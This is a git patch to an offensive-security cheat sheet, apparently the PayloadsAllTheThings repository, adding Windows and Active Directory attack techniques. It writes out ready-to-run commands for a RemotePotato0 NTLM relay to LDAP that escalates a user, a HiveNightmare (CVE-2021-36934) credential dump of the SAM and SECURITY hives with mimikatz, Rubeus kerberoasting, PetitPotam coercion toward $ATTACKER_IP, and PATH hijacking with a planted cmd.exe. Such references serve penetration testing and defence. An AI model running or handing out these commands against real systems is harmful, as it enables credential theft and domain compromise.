From d9d4a54d03a39e0b42b10e6fcc719a48af8054d1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 26 Jul 2021 21:25:56 +0200 Subject: [PATCH] RemotePotato0 + HiveNightmare --- .../Active Directory Attack.md | 30 ++++++- .../Windows - Privilege Escalation.md | 80 +++++++++++++------ 2 files changed, 85 insertions(+), 25 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b4c8b11..403768c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -61,6 +61,7 @@ - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) - [Drop the MIC](#drop-the-mic) - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) + - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) - [AD CS Relay Attack](#ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -1380,8 +1381,16 @@ Any valid domain user can request a kerberos ticket (TGS) for any domain service * [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell + # Stats + Rubeus.exe kerberoast /stats + ------------------------------------- ---------------------------------- + | Supported Encryption Type | Count | | Password Last Set Year | Count | + ------------------------------------- ---------------------------------- + | RC4_HMAC_DEFAULT | 1 | | 2021 | 1 | + ------------------------------------- ---------------------------------- + # Kerberoast (RC4 ticket) - .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt + Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt # Kerberoast (AES ticket) # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. @@ -1737,6 +1746,23 @@ Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impack ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe ``` +#### RemotePotato0 DCOM DCE RPC relay + +> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine + +Requirement: + +* a shell in session 0 (e.g. WinRm shell or SSH shell) +* a privileged user is logged on in the session 1 (e.g. a Domain Admin user) + +```powershell +# https://github.com/antonioCoco/RemotePotato0/ +Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 +Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 +Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 +Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' +``` + #### AD CS Relay Attack Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) @@ -1748,7 +1774,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # template workstation, DomainController, Machine # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam - # You can also use any other way to coerce the authentication like printspooler + # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN git clone https://github.com/topotam/PetitPotam python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d8cb00a..832ed73 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -14,6 +14,7 @@ * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) + * [HiveNightmare](#hivenightmare) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) @@ -28,6 +29,7 @@ * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) +* [EoP - $PATH Interception](#eop---path-interception) * [EoP - Named Pipes](#eop---named-pipes) * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) @@ -384,7 +386,37 @@ pwdump SYSTEM SAM > /root/sam.txt samdump2 SYSTEM SAM -o sam.txt ``` -Then crack it with `john -format=NT /root/sam.txt`. +Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash. + + +### HiveNightmare + +> CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user + +Check for the vulnerability using `icacls` + +```powershell +C:\Windows\System32> icacls config\SAM +config\SAM BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! +``` + +Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. + +```powershell +mimikatz> token::whoami /full + +# List shadow copies available +mimikatz> misc::shadowcopies + +# Extract account from SAM databases +mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM + +# Extract secrets from SECURITY +mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY +``` + ### Search for file contents @@ -794,6 +826,30 @@ For `C:\Program Files\something\legit.exe`, Windows will try the following paths - `C:\Program.exe` - `C:\Program Files.exe` + +## EoP - $PATH Interception + +Requirements: +- PATH contains a writeable folder with low privileges. +- The writeable folder is _before_ the folder that contains the legitimate binary. + +EXAMPLE: +```powershell +# List contents of the PATH environment variable +# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 +$env:Path + +# See permissions of the target folder +# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW +icacls.exe "C:\Program Files\nodejs\" + +# Place our evil-file in that folder. +copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" +``` + +Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. + + ## EoP - Named Pipes 1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` @@ -1257,28 +1313,6 @@ Failing on : Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege -## EoP - $PATH Interception - -Requirements: -- PATH contains a writeable folder with low privileges. -- The writeable folder is _before_ the folder that contains the legitimate binary. - -EXAMPLE: -``` -//(Powershell) List contents of the PATH environment variable -//EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 -$env:Path - -//See permissions of the target folder -//EXAMPLE OUTPUT: BUILTIN\Users: GR,GW -icacls.exe "C:\Program Files\nodejs\" - -//Place our evil-file in that folder. -copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" -``` - -Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. - ## References * [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)